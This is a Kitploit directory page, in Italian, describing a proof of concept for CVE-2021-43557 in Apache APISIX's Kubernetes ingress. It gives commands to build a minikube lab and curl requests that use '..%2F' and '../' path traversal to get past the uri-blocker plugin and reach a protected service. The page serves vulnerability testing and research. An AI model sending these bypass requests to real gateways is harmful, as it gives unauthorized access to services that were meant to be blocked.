Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
k8s-CVE-2021-43557-poc — PoC per CVE-2021-43557 | Kitploit
Strumenti/GitHubGitHub/xvnpw/k8s-cve-2021-43557-poc
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza CloudSicurezza delle API
GitHubxvnpw/k8s-cve-2021-43557-poc

k8s-CVE-2021-43557-poc

PoC per CVE-2021-43557

Vedi Repository
2234 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Installazione

  • installa minikube
  • installa apisix:
root@kitploit:~
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
  • distribuisci app.yaml: kubectl apply -f app.yaml
  • distribuisci le route: kubectl apply -f routes.yaml

Facoltativo, se hai bisogno di modificare le immagini delle app:

  • (facoltativo) crea le immagini docker:
    • cd protected-service; docker build -t protected-service:0.0.1 .
    • cd public-service; docker build -t public-service:0.0.1 .
  • (facoltativo) carica le immagini docker in minikube:
    • minikube image load protected-service:0.0.1
    • minikube image load public-service:0.0.1

Sfruttamento

Manualmente

Per accedere al servizio pubblico:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'

dovrebbe restituire 200

Per accedere al servizio protetto:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'

dovrebbe restituire 403

Per accedere al servizio protetto bypassando uri-blocker: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test' Per accedere al servizio protetto bypassando uri-blocker: kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'

Entrambi dovrebbero restituire 200

Scarica lo strumento